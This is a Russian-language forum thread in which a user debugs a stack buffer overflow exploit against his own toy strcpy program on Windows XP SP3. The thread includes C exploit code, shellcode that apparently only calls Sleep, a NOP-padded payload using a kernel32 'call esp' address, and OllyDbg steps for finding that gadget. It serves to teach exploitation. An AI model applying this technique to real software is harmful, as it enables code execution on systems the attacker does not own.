Помогите разобраться с переполнением буфера

Прочитал довольно много статей. Вроде все понятно, но не выходит реализовать
Собственно, вот код:

Code:

#include <iostream>
#include <stdio.h>
#include <windows.h>

char shellcode[] = "\x31\xc0\xbb\x46\x24\x80\x7c\x66\xb8\x98\x3a\x50\xff\xd3";

int main(int argc, char* argv[])
{
char buf[200];
char exec[600];

memset(buf,0x00,sizeof(buf));
memset(buf,0x90,150-strlen(shellcode)); 
memcpy(buf+strlen(buf), &shellcode, strlen(shellcode)); 

*(long *)&buf[112] = 0x0022FF60; // при 112 уязвимая программа падает, при 111 уже нет

sprintf(exec,"overflow.exe %s",buf);
system(exec);
printf("\r\n");
system("pause");
return 0;
}

overflow.exe :

Code:

int main(int argc, char *argv[]) {

    char buf[100];
    strcpy(buf, argv[1]);
    cout << buf;
    return 0;

}

Чтобы не было вопросов с правильностью определения адреса возврата


Так же удивляет, что при выполнении, в выводе последний символ есть раскодированный последний байт адреса.

' есть 60 в hex, если заменить адрес возврата на, допустим, 0x0022FF61, то последним символом в выводе будет a(61 в hex).

И что я делаю не так?

Ах да, win XP Pro sp3

P.S. При удачном исполнении программа должна просто проспать 15 секунд.

 

Что даешь на вход buf?

 

Ну если ты об этом:

Code:

memset(buf,0x00,sizeof(buf));
memset(buf,0x90,150-strlen(shellcode)); 
memcpy(buf+strlen(buf), &shellcode, strlen(shellcode));

То сначала просто очищаю, записываю нопы, в конец дописываю код, который должен исполниться.

 

Нет, это понятно.

Я думаю дело в этой строчке. *(long *)&buf[112] = 0x0022FF60;

 

Вот так тебе нужно сделать:

Code:

#include <string.h>
#include <stdio.h>

char shellcode[] = 
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\x35\x35\x35\x35"
"\xf0\x69\x83\x7c" // call esp in Kernel32
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x31\xc0" // твой код
"\xbb\x46\x24\x80" //
"\x7c\x66\xb8\x98" //
"\x3a\x50\xff\xd3"; //

int main (int argc, char **argv) {
    char buf[10];
    memset (buf, 0, sizeof(buf));
    strcpy(buf, shellcode);
    return 0;
}

где shellcode - строка которую тебе нужно сгенерировать в твоей первой программе.

PS. Я уменьшил длину массива до 10 байт, если тебе обязательно нужно больше, то увеличивай первую секцию шеллкода (до call esp) пока регистр EIP не перетрется нашем адресом и всё.

PPS. Адрес интсрукции call ESP может у нас отличаться. У меня Windows XP SP3 En x86

 

А как ты call esp нашел? Я всю программу перерыл в поисках call или jmp esp, так ничего и не нашел. IDA поиском не находит.

 

1. Запускаешь прогу в отладчике (я использовал OllyDbg)
2. Открываешь список подгруженных библиотек (Alt + E)
3. Ищем среди них Kernel32.dll (эта библиотека как и ntdll.dll, msvcrt.dll всегда подгружены к любой программе в Windows)
4. Кликаешь правой кнопкой на ней и выбираешь "Follow Entry" и тебя перекидывает по базовому адресу загрузки Kernel32.dll
5. Далее будем искать нужную нам команду в этой библиотеке. Наживаем Ctrl + F и вводим команду call esp
6. И о чудо мы видим её)) (в крайнем левом столбце будет адрес этой команды)

Ну как-то так!

 

Нашел, 7C809F83. В проге записываю так "\x83\x9F\x80\x7c", она просто падает. А у меня возник вопрос, ну хорошо мы вызываем call esp, а esp сейчас указывает ведь на мусор...

 

Регистр ESP указывает ВСЕГДА на вершину стека. Если у тебя правильно перетерся EIP, то ESP указывает на код, который идет после этого адреса (в моем шелкоде там идут нопы (0x90))

 

Да, надо было несколько \x35 убрать и все заработало Сейчас переделаю свой код.

Upd.

Code:

#include <iostream>
#include <stdio.h>
#include <windows.h>

char shellcode[] =
"\x31\xc0\xbb\x46"
"\x24\x80\x7c\x66"
"\xb8\x98\x3a\x50"
"\xff\xd3";

int main(int argc, char* argv[]) {
    char buf[300];
    char exec[600];
    memset(buf,0x00,sizeof(buf));
    memset(buf,0x41,112);
    buf[112] = '\x83';
    buf[113] = '\x9F';
    buf[114] = '\x80';
    buf[115] = '\x7c';
    //memset(buf+strlen(buf), 0x90, 5);
    memcpy(buf+strlen(buf), &shellcode, strlen(shellcode)); 
    sprintf(exec,"overflow.exe %s",buf);
    system(exec);
    system("pause");
    return 0;
}

На выходе имею:


Судя по всему call esp выполняется, чтобы проверить записываем после call esp перед шеллом 5 нопов.


Теперь в выводе видим, что эти 5 нопов появились в команде, значит call esp выполнился и нас перебросило на шеллкод. Так вот не понимаю, почему он не выполняется


P.S. Вопрос для знатоков, можно ли в IDA, при вызове одной программы из другой, как в данном случае например, дизассемблировать вызываемую программу? То есть если exec.exe вызывает overflow.exe - IDA во время вызова overflow.exe, подключается к ней.